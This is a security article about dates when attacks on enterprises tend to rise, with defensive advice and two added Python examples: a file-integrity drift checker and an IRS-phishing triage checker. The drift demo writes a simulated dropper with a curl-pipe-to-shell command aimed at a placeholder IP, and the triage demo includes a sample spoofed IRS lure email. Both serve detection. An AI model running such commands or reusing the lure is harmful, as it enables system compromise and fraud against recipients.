Keep these cyberthug holidays marked on your calendar

They won’t knock on the front door bearing gifts and treats, but sooner or later, you’ll know these goons have arrived as you and your organization foot the bill for their good time.

It’s no happy day for enterprises when cyber thugs celebrate their favorite ‘holidays’: special dates when they attack with extra cunning and fervor. Learn these dates and be ready to respond when the related attacks land.

  1. Software Support Retirement / End of Support Day. This is the date when a vendor stops supporting an OS or software package. Unsupported software leaves the enterprise open to attack: because the vendor will no longer release security patches, every new hole attackers find in it stays open for good.

To prepare for this day and defend the enterprise against such attacks, investigate whether the vendor offers extended support at a premium. Weigh that cost against the cost of deploying the current product or version that replaces the retired one. Either path is going to cost you.

If neither option fits your budget, consider a refresh roadmap that includes well-supported open-source software for applications where the reward outweighs the risk. Such software can be more affordable to keep current.

  2. Zero-Day. A zero-day is a vulnerability that attackers are already exploiting before the vendor has a patch for it; the vendor has had ‘zero days’ to fix the flaw. Until a patch ships, the software stays exposed, and that can take a very long time. “Zero-day attacks last between 19 days and 30 months, with a median of eight months and an average of approximately 10 months,” according to “Before We Knew It: An Empirical Study of Zero-Day Attacks in the Real World”, Symantec Research Labs, 2012.

Since zero-days can go unpatched for so long, patching alone cannot protect you while no patch exists. To defend the enterprise in that window, be ready to discover and remediate attacks quickly and thoroughly. Threat intelligence providers that share indicators of compromise can give network defenders advance warning, says Margee Abrams, director of security solutions, Neustar. Baseline, harden and image endpoint devices so that you can immediately reimage any endpoint that drifts outside that baseline, adds Abrams.
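The baseline-then-detect-drift approach Abrams describes, as an added example that is not part of the original article or any vendor's product: the script records a SHA-256 manifest of every file under a directory (the “image”), then reports what has been added, removed or modified since. The small endpoint tree, the edited hosts file, the dropped script and the deleted library are all constructed inline for the demonstration; the 203.0.113.7 address is documentation space, not a real indicator.

```python
import hashlib
import os
import tempfile


def sha256_file(path, chunk=65536):
    """Stream a file through SHA-256 so large binaries need not fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def build_baseline(root):
    """Map every regular file under root (relative POSIX path) to its SHA-256.
    Symlinks are skipped so a link cannot pull files from outside the tree."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.islink(full):
                continue
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            baseline[rel] = sha256_file(full)
    return baseline


def drift_from_baseline(root, baseline):
    """Compare the tree as it is now against the stored baseline.
    Returns sorted lists; all three empty means the host still matches its image."""
    current = build_baseline(root)
    both = set(current) & set(baseline)
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in both if current[p] != baseline[p]),
    }


def demo():
    """Constructed scenario (assumption, not real data): image a tiny 'endpoint',
    then simulate a compromise that edits a config file, drops a script and
    deletes a library."""
    with tempfile.TemporaryDirectory() as root:
        files = {
            "bin/sshd": b"\x7fELF sshd placeholder",
            "etc/hosts": b"127.0.0.1 localhost\n",
            "lib/libc.so": b"\x7fELF libc placeholder",
        }
        for rel, data in files.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as f:
                f.write(data)

        # In production the baseline must live off-host (and be signed), or an
        # attacker simply rewrites it along with the files.
        baseline = build_baseline(root)

        # Post-compromise changes.
        with open(os.path.join(root, "etc/hosts"), "ab") as f:
            f.write(b"203.0.113.7 update.vendor.example\n")  # hijacked update host
        os.makedirs(os.path.join(root, "tmp"))
        with open(os.path.join(root, "tmp/dropper.sh"), "wb") as f:
            f.write(b"#!/bin/sh\ncurl -s http://203.0.113.7/p | sh\n")
        os.remove(os.path.join(root, "lib/libc.so"))

        return drift_from_baseline(root, baseline)


if __name__ == "__main__":
    print(demo())
```

Any non-empty list from `drift_from_baseline` is the trigger to pull the host and reimage it; a hash manifest catches tampering that a version check never would, which is the whole point while no patch exists.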

  3. Patch Tuesday / IDA Pro Wednesday. By the day after Patch Tuesday, attackers have routinely reverse engineered Microsoft’s patches with the IDA Pro disassembler and released exploits for the vulnerabilities those patches fix, says Jayson Street, Infosec Ranger, Pwnie Express.

To prepare for and defend against IDA Pro Wednesday, enterprises should keep ample, layered mitigations in place, such as network firewalls, IPS and network segmentation, as buffers until the organization can roll out the patches, Street explains.

  4. Data Dump Day. This is any day when attackers release stolen data online on anonymous text-sharing or bulletin board sites such as Pastebin or 4chan. Dumps can include employee information, customer information such as credit card numbers and PII, intellectual property and trade secrets, and much more, says Demetrios Lazarikos, CISO, vArmour. If your enterprise is the target on Data Dump Day, you or your customers could suffer further attacks, financial losses and/or embarrassment, which for the enterprise can mean brand damage.

To prepare for these surprises, improve your awareness of the data in such dumps. Engage qualified threat research teams that monitor the Internet underground for criminal activity, which often heightens just before a dump occurs, says Lazarikos. When a dump does happen, an incident response plan should already be in place so the organization can investigate its environment, coordinating internal and external threat research to gauge the damage as it unfolds and trace the source of the attack with forensic tools and experts, says Lazarikos. Use those resources, law enforcement, and the remediation technologies and techniques that should already be in place to bring the event to a speedy close.


  5. Quarterly Earnings Day. Attacks on public companies occur just before a big quarterly earnings release, combined with shadow shorting of the company’s stock to make money on the ensuing mayhem, says Michael Argast, director, security solutions, TELUS. “Shorting is basically selling a stock without owning it, with the plan to buy the stock later on when the price drops. By creating a crisis, the attackers can manipulate the stock price downwards and profit when the price goes back up,” explains Argast.

To defend against this cyber thug celebration, make sure the security team is on high alert and recognizes that this is a critical time for the business, says Argast. Realize that the criminals don’t necessarily need a technological attack vector to create havoc here. “They can also use fake press releases to create false, foreboding news about the company. Monitor social and financial networks for information that may be inaccurate and be ready to respond quickly,” says Argast.

  6. Black Friday / Cyber Monday. Heavy shopping on these dates means more credit cards and consumer data in flight, and attackers time their campaigns to take advantage.

Retail security expert Demetrios Lazarikos, CISO, vArmour, cites these areas of preparation for keeping attackers from profiting most on these dates. Use data center, IT and security solutions that are non-intrusive and transparent to stakeholders, so that the organization can continually see what is going on inside its systems despite its constant embrace of emerging technologies, according to Lazarikos. “Embed IT solutions that align with digital transformation and evaluate these technologies even during the holiday shopping season. This is the best time to evaluate new systems since this is when the most traffic will visit your environment and when cyber criminals are most active,” says Lazarikos.

  7. Tax Day. “I’ve seen an increase in phishing/spear phishing attacks on the business around Tax Day (April 15th),” says Lazarikos. The emails typical of these attacks impersonate the IRS, asking the recipient to visit the enclosed ‘IRS’ link or open the ‘IRS’ file. The link or file then requests updated personally identifiable information (PII), which the attackers exploit.

During tax time, says Lazarikos, remember that the IRS never sends such emails; it makes contact only through the US mail. “If you are a business owner, employee, or executive who received this, email the IRS about it at,” says Lazarikos. Never open such a message or follow its instructions. Keep and share clear, highly visible, company-wide policies about this.
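A triage check for the IRS-themed lure described above, as an added example that is not part of the original article or any product mentioned in it. It parses a raw message, flags a display name that claims to be the IRS while the sender is not under irs.gov, flags every link whose target host is not irs.gov or a subdomain of it (the href is what counts, not the anchor text), and lists any attachment the reader is asked to open. Both sample messages are constructed for the demonstration; the `.example` domains are reserved names, not real senders.

```python
import email
import email.utils
import re
from email import policy
from urllib.parse import urlparse

IRS_DOMAIN = "irs.gov"  # the IRS's own domain; everything else is suspect
IRS_NAME_RE = re.compile(r"\birs\b|internal revenue", re.IGNORECASE)
# Crude URL extractor, adequate for plain-text and simple HTML bodies.
URL_RE = re.compile(r"""https?://[^\s"'<>)]+""", re.IGNORECASE)


def is_irs_host(host):
    """True only for irs.gov or a subdomain of it. The label-boundary check rejects
    look-alikes such as 'irs.gov.example' and 'irs-gov.example'."""
    host = (host or "").lower().rstrip(".")
    return host == IRS_DOMAIN or host.endswith("." + IRS_DOMAIN)


def triage_irs_email(raw):
    """Return human-readable findings for one RFC 822 message; [] means nothing flagged."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings = []

    name, addr = email.utils.parseaddr(str(msg.get("From", "")))
    sender_host = addr.rsplit("@", 1)[-1] if "@" in addr else ""
    if IRS_NAME_RE.search(name) and not is_irs_host(sender_host):
        findings.append(f"display name claims the IRS but sender domain is "
                        f"{sender_host or 'unknown'}")

    # Collect text bodies (plain and HTML) to decide whether the lure is IRS-themed
    # and to harvest its links.
    bodies = [part.get_content() for part in msg.walk()
              if part.get_content_maintype() == "text"]
    themed = bool(IRS_NAME_RE.search(" ".join([name, str(msg.get("Subject", ""))] + bodies)))
    if not themed:
        return findings  # an ordinary mail; other detections apply, not this one

    urls = set()
    for body in bodies:
        urls.update(URL_RE.findall(body))
    for url in sorted(urls):
        if not is_irs_host(urlparse(url).hostname):
            findings.append(f"link leaves irs.gov: {url}")

    for part in msg.iter_attachments():
        findings.append(f"attachment the reader is told to open: "
                        f"{part.get_filename() or 'unnamed'}")
    return findings


# Constructed sample: the lure. Note the anchor text shows a real irs.gov URL
# while the href points elsewhere, and a 'form' is attached.
PHISH = """\
From: "Internal Revenue Service" <refunds@irs-gov-notice.example>
To: cfo@corp.example
Subject: Action required: refund on hold until you verify your details
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html; charset="utf-8"

<p>Your refund is on hold. Verify your identity at
<a href="http://irs-gov-notice.example/verify">https://www.irs.gov/refund</a>
before April 15.</p>
--b1
Content-Type: application/octet-stream; name="IRS_Form_W9.zip"
Content-Disposition: attachment; filename="IRS_Form_W9.zip"
Content-Transfer-Encoding: base64

UEsDBAoAAAAAAA==
--b1--
"""

# Constructed control: a colleague pointing at the real IRS site.
LEGIT = """\
From: Alice Tax <alice@corp.example>
To: cfo@corp.example
Subject: IRS filing forms for the quarter
Content-Type: text/plain; charset="utf-8"

The forms we need are at https://www.irs.gov/forms-instructions
"""

if __name__ == "__main__":
    for label, raw in (("phish", PHISH), ("legit", LEGIT)):
        print(label, triage_irs_email(raw))
```

The link check deliberately keys on the href host rather than the visible text, because the visible text is exactly what the lure controls; and the themed gate keeps the rule from flagging every internal mail that links to a vendor site. It is a triage aid for the mailbox or gateway, not a replacement for the policy Lazarikos recommends.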

The broader calendar

If you’ve been in security for a while, you know that attacks ebb and flow. If they seem to cluster around particular dates or events for your organization, add those to the list and be especially resilient at those times.

By David Geer